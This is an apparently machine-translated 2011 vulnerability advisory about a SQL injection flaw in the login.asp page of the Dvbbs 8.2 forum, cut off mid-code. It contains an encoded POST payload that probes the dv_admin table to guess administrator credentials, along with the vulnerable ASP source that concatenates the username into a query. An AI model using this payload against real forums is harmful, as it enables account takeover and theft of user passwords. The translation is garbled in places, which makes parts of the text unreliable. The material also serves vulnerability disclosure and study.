Dvbbs8. 2 sql Edition login. asp remote sql injection vulnerability-vulnerability warning-the black bar safety net

2011-10-31T00:00:00
ID MYHACK58:62201132210
Type myhack58
Reporter 佚名
Modified 2011-10-31T00:00:00

Description

Today in learn PHP when a friend sent me to a station, lets do a security check, find the station there is a forum dvbbs, Oh, this is a vulnerability to ever guy.

The latest version of the and storm a remoteSQL injectionvulnerabilities in it! The following provides the vulnerability analysis and the use!

【Vulnerability description】China's most widely used Forum app, the latest dvbbs8. 2 injection vulnerability 0day including the official version, including access and sql versions. The vulnerability exists on the source application login. asp The [vulnerability analysis] Login. the asp program in to check the hidden value of the user username of the login when there is no filtering special symbols that can lead to the use ofsql injectionway to guess the forum admin and all user passwords, or perform other advanced sql statements is a direct threat to Server Security. 【Vulnerability level] high-risk The [code analysis]

password=1 2 3 1 2 3&codestr=7 1&CookieDate=2&userhidden=2&comeurl=index. asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2 5 2 7%2520and%2 5 2 0 1%253D%2528select%2520count%2 5 2 8*%2 5 2 9%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2 5 2 9%253D%2527a%2 5 2 7% 2 5 2 9%2520and%2 5 2 0% 2 5 2 7 1% 2 5 2 7%253D%2 5 2 7 1

Login. asp code snippet

-----------------------------------------------------------------------------------------------------------------

Rem==========the forum login function========= Rem determine the user login Function ChkUserLogin(username,password,mobile,usercookies,ctype) Dim rsUser,article,userclass,titlepic Dim userhidden,lastip,UserLastLogin Dim GroupID,ClassSql,FoundGrade Dim regname,iMyUserInfo Dim sql,sqlstr,OLDuserhidden FoundGrade=False lastip=Dvbbs. UserTrueIP userhidden=request. form("userhidden") If userhidden < > "1" Then userhidden=2 ChkUserLogin=false If mobile<>"" Then sqlstr=" Passport='"&amp; mobile&"'" Else sqlstr=" UserName='"&username&"'" End If Sql="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,lastlogin as cometime , LastLogin as activetime,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday,UserMoney,UserTicket,FollowMsgID,Vip_StarTime,Vip_EndTime,userid as boardid" Sql=Sql & " From [Dv_User] Where "&sqlstr&"" set rsUser=Dvbbs. Execute(sql) If rsUser. eof and rsUser. bof Then 'strString("本 论坛 不 存在 该 用户名 .@@@@0") ChkUserLogin=False Exit Function Else If rsUser("Lockuser") =1 Or rsUser("UserGroupID") =5 Then ChkUserLogin=False Exit Function Else If Trim(password)=Trim(rsUser("UserPassword")) Then ChkUserLogin=True Dvbbs. UserID=RsUser("UserID") RegName = RsUser("UserName") Article= RsUser("UserPost") UserLastLogin = RsUser("cometime") Focus On Your Chosen = RsUser("Focus On Your Chosen") GroupID = RsUser("userGroupID") OLDuserhidden=RsUser("UserHidden") TitlePic = RsUser("UserTitle") If Article < 0 Then Article=0 Set Dvbbs. UserSession=Dvbbs. RecordsetToxml(rsUser,"userinfo","xml") Dvbbs. UserSession. documentElement. selectSingleNode("userinfo/@cometime"). text=Now() Dvbbs. UserSession. documentElement. selectSingleNode("userinfo/@activetime"). text=DateAdd("s",-3600,Now()) Dvbbs. UserSession. documentElement. selectSingleNode("userinfo/@boardid"). text=0 Dvbbs. UserSession. documentElement. selectSingleNode("userinfo"). attributes. setNamedItem(Dvbbs. UserSession. createNode(2,"isuserpermissionall","")). text=Dvbbs. FoundUserPermission_All() If OLDuserhidden <> CLng(userhidden) Then

[1] [2] next